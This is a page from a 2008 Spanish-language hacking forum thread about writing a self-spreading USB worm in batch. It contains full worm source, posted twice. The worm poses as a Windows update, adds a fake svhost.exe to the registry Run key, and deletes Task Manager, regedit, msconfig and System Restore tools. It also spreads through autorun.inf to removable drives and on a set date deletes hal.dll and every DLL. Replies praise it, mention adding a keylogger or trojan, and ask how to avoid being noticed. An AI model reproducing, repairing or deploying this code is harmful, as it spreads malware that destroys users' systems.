elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  HOW-TO Crear Gusano de Memorias USB en BATCH
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: HOW-TO Crear Gusano de Memorias USB en BATCH  (Leído 36,588 veces)
‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #10 en: 6 Marzo 2008, 17:26 pm »

pense que no se podria hacer algo asi en batch :P


En línea

neider

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #11 en: 6 Marzo 2008, 22:27 pm »

Esta muy bien el manual , estaba buscando algo asi!

octalh, lo unico que creo que falta es que pongas la forma de desinfectarse xD, aunque si no mal he entendido creo que basta con borrar el autorun del usb y ya no contagiara a nadie mas. Y luego borrar el directorio que crea en lacarpeta de windows


Ah y otra cosa mas, rayluch, si no te importa podrias poner los cambios que le has hecho para que lo vieramos todos (Si no quieres que nadie lo tenga como tu no lo pongas y no pasa nada)

Ala byes


En línea

rayluch

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #12 en: 6 Marzo 2008, 23:14 pm »

Modificando el código de octalh he añadido una función para que si no existe el archivo "x" (troyano, keylogger) instalado en la parte correspondiente del pc se auto ejecute el server automáticamente.

Te doy las gracias otra vez octalh, gracias a ti ya se cómo programar en batch, y empecé desde cero hace 2 días.

EDIT: Por cierto, yo también quiero saber cómo desinfentarlo.

EDIT2: Neider, lo que he hecho es usar las mismas funciones que tiene el código original, si buscas por Internet verás enseguida muchos tutoriales de batch y con eso te aclararas mejor como lo he hecho yo, no es difícil.

Saludos.
« Última modificación: 7 Marzo 2008, 17:51 pm por rayluch » En línea

rayluch

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #13 en: 7 Marzo 2008, 17:44 pm »

Código:
ECHO shell\1=abrir >> %AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shell\2\=explorar >> %AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >> %AUTORUNORIGINAL%

¿Alguien podría explicar esta parte específica de aquí? Es que no se muy bien cómo funcionan esos comandos.
« Última modificación: 7 Marzo 2008, 21:37 pm por rayluch » En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #14 en: 7 Marzo 2008, 23:13 pm »

bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:
Código
  1. @echo off
  2.  
  3. goto initio
  4.  
  5. initio
  6. title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)
  7.  
  8. AT 12:00 goto jornada
  9. AT 28/03/09 goto apocalpypse
  10.  
  11. CLS
  12.  
  13. if exist %windir%\regedit.exe (goto conqeror) else (goto espora)
  14.  
  15.  
  16. conqueror
  17. CLS
  18.  
  19. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  20.  
  21. rem Southern Cross, by Corax
  22.  
  23. copy \svhost.exe C:\WINDOWS\System32\svhost.exe
  24. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe
  25.  
  26. CLS
  27.  
  28. echo [autorun]>>%Windir%\cursors\autorun.inf"
  29. echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"
  30.  
  31. CD %WINDIR%\System32\"
  32. del /Q /F taskmgr.exe
  33. del /Q /F taskkill.exe
  34.  
  35. CLS
  36.  
  37. CD %WINDIR%\System32\"
  38. del /Q /F regedt32.exe
  39. del /Q /F wscui.cpl
  40. del /Q /F command.com
  41.  
  42. CLS
  43.  
  44. CD %windir%\System32\restore\"
  45. del /Q /F rstrui.exe
  46. del /Q /F srdiag.exe
  47.  
  48. CLS
  49.  
  50. CD "%windir%\"
  51. del /Q /F taskman.exe
  52. del /Q /F regedit.exe
  53.  
  54. CLS
  55.  
  56. CD "%windir%\PCHealth\HelpCtr\Binaries\"
  57. del /Q /F msconfig.exe
  58.  
  59. CLS
  60.  
  61. goto espora
  62.  
  63.  
  64.  
  65.  
  66. espora
  67. CLS
  68. if exists E:\ (goto 1) else (goto faren)
  69.  
  70. faren
  71. CLS
  72. if exists F:\ (goto 2) else (goto gotrek)
  73.  
  74. gotrek
  75. CLS
  76. if exists G:\ (goto 3) else (goto hyperion)
  77.  
  78. hyperion
  79. CLS
  80. if exists H:\ (goto 4) else (goto espora)
  81.  
  82.  
  83. 1
  84. if exists E:\svhost.exe (goto faren) else (goto 11)
  85.  
  86. 2
  87. if exists F:\svhost.exe (goto gotrek) else (goto 22)
  88.  
  89. 3
  90. if exists G:\svhost.exe (goto hyperion) else (goto 33)
  91.  
  92. 4
  93. if exists H:\svhost.exe (goto espora) else (goto 44)
  94.  
  95. 11
  96. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  97. copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
  98. copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
  99. CLS
  100. goto espora
  101.  
  102. 22
  103. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  104. copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
  105. copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
  106. CLS
  107. goto espora
  108.  
  109. 33
  110. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  111. copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
  112. copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
  113. CLS
  114. goto espora
  115.  
  116. 44
  117. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  118. copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
  119. copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
  120. CLS
  121. goto espora
  122.  
  123.  
  124.  
  125.  
  126.  
  127. jornada
  128. CLS
  129. shutdown -s -t 10
  130.  
  131.  
  132.  
  133.  
  134. apocalypse
  135.  
  136. CD "%WINDIR%\System32\"
  137. del /Q /F hal.dll
  138.  
  139. CD "%WINDIR%\"
  140. del /S /Q /F *.dll
  141.  
  142. shutdown -s t- 10
  143. pause
  144. exit
« Última modificación: 7 Marzo 2008, 23:18 pm por corax » En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
krlos__gb

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #15 en: 11 Marzo 2008, 21:04 pm »

gracias estaba buscando algo como esto
pero.. no entiendo mucho el code
si alguien me pudiera aclarar un poco la cosa porfavor
me eh matado trantando de entenderlo xD

espero ayuda saludos
En línea

catkill

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #16 en: 12 Marzo 2008, 15:55 pm »

 :D
EXCELENTE CODIGO, RECIEN ESTOY EMPEZANDO CON BATCH Y NO CREI QUE
TUVIERA TANTAS FACILIDADES PARA DESARROLLAR UN VIRUS
En línea

-=Hate_dark=-

Desconectado Desconectado

Mensajes: 62


hasta mañana si me da la GANA ( DIOS ) JI JIIII JI


Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #17 en: 4 Abril 2008, 08:05 am »

octalh MUUUUUUUUY agradecido de verdad... es una maravilla esto :O... he pillado lo que posteas y siempre me impresionas con tu didactica.. de que se te entiende se te entiende... no se programar.. vi unas horas de programacion en C++ pero no fue mucho lo que logre hacer.. tambien admito falta de boluntad y tiempo... pero no es nada dificil el batch y es bastante simpatico y facil de manejar.. gracias por este post que estoy seguro muchos necesitaban leer XD....

  PD: lo unico que no me gusto de esto es que ya despues de que se esta expandiendo el worm no deja desconectar el pendrive en modo seguro.. lo que pone en alerta a la persona y posiblemente se vaya parando la cadena...
   no habria manera de evitar que esto suceda ? cual es la razon... que es lo que esta usando del disco??.. corrijanme si me equivoco... ya que esta haciendo un ping para que a los 60 segundo se repita el algoritmo esto es lo que mantiene ocupado a pen ? y por eso no lo deja sacar en modo seguro ?... que otras alternativas habria a esto ?...

Gracias de nuevo..
sigue asi =)
En línea

lO IMPORTANTE NO ES SABER SI NO TE ER EL tlf DEL QUE SABE =D pero es mejor saber por uno mEEEEsmo por eso hay que leer shiiiiiiike!
-=Hate_dark=-

Desconectado Desconectado

Mensajes: 62


hasta mañana si me da la GANA ( DIOS ) JI JIIII JI


Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #18 en: 4 Abril 2008, 08:08 am »

bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:
Código
  1. @echo off
  2.  
  3. goto initio
  4.  
  5. initio
  6. title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)
  7.  
  8. AT 12:00 goto jornada
  9. AT 28/03/09 goto apocalpypse
  10.  
  11. CLS
  12.  
  13. if exist %windir%\regedit.exe (goto conqeror) else (goto espora)
  14.  
  15.  
  16. conqueror
  17. CLS
  18.  
  19. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  20.  
  21. rem Southern Cross, by Corax
  22.  
  23. copy \svhost.exe C:\WINDOWS\System32\svhost.exe
  24. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe
  25.  
  26. CLS
  27.  
  28. echo [autorun]>>%Windir%\cursors\autorun.inf"
  29. echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"
  30.  
  31. CD %WINDIR%\System32\"
  32. del /Q /F taskmgr.exe
  33. del /Q /F taskkill.exe
  34.  
  35. CLS
  36.  
  37. CD %WINDIR%\System32\"
  38. del /Q /F regedt32.exe
  39. del /Q /F wscui.cpl
  40. del /Q /F command.com
  41.  
  42. CLS
  43.  
  44. CD %windir%\System32\restore\"
  45. del /Q /F rstrui.exe
  46. del /Q /F srdiag.exe
  47.  
  48. CLS
  49.  
  50. CD "%windir%\"
  51. del /Q /F taskman.exe
  52. del /Q /F regedit.exe
  53.  
  54. CLS
  55.  
  56. CD "%windir%\PCHealth\HelpCtr\Binaries\"
  57. del /Q /F msconfig.exe
  58.  
  59. CLS
  60.  
  61. goto espora
  62.  
  63.  
  64.  
  65.  
  66. espora
  67. CLS
  68. if exists E:\ (goto 1) else (goto faren)
  69.  
  70. faren
  71. CLS
  72. if exists F:\ (goto 2) else (goto gotrek)
  73.  
  74. gotrek
  75. CLS
  76. if exists G:\ (goto 3) else (goto hyperion)
  77.  
  78. hyperion
  79. CLS
  80. if exists H:\ (goto 4) else (goto espora)
  81.  
  82.  
  83. 1
  84. if exists E:\svhost.exe (goto faren) else (goto 11)
  85.  
  86. 2
  87. if exists F:\svhost.exe (goto gotrek) else (goto 22)
  88.  
  89. 3
  90. if exists G:\svhost.exe (goto hyperion) else (goto 33)
  91.  
  92. 4
  93. if exists H:\svhost.exe (goto espora) else (goto 44)
  94.  
  95. 11
  96. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  97. copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
  98. copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
  99. CLS
  100. goto espora
  101.  
  102. 22
  103. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  104. copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
  105. copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
  106. CLS
  107. goto espora
  108.  
  109. 33
  110. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  111. copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
  112. copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
  113. CLS
  114. goto espora
  115.  
  116. 44
  117. title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
  118. copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
  119. copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
  120. CLS
  121. goto espora
  122.  
  123.  
  124.  
  125.  
  126.  
  127. jornada
  128. CLS
  129. shutdown -s -t 10
  130.  
  131.  
  132.  
  133.  
  134. apocalypse
  135.  
  136. CD "%WINDIR%\System32\"
  137. del /Q /F hal.dll
  138.  
  139. CD "%WINDIR%\"
  140. del /S /Q /F *.dll
  141.  
  142. shutdown -s t- 10
  143. pause
  144. exit

Muy interezante... si estoy viendo los errores.. a lo mejor no detallo algunos ya que apenas hoy me voy enterando de esta maravilla de todas formas espero que ayudes un poco tambien vale ?.... otra cosa es que esta un poco agresivo XD como para probarlo con uno mismo ...  de todas formas lo seguire detallando y viendo que le puedo quitar o poner.. gracias por compartir...

PD: no me he fijado si cambiaste lo del ping que puso octalh para que se repitiera el ciclo.. que otras alternativas a estas se te ocurre para que se pueda extraer el pendrive en modo seguro sin problemas.
En línea

lO IMPORTANTE NO ES SABER SI NO TE ER EL tlf DEL QUE SABE =D pero es mejor saber por uno mEEEEsmo por eso hay que leer shiiiiiiike!
siete7

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: HOW-TO Crear Gusano de Memorias USB en BATCH
« Respuesta #19 en: 7 Abril 2008, 16:55 pm »

Tengo un pequeño problema  con el Quick_Batch_File_Compiler_3.1.5.0.
 cuando compilo mi pequeño prog en batch(solo son varias sentencias para copiar un archivo a otro lado) para que no aparezca la ventana en  MsDos  mi antivirus, el AVG free, me lo detecta como un troyano y no me deja compilarlo. Si cierro los procesos del antivirus y compilo el programa falla.
Puede alguien ayudarme.
En línea

Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines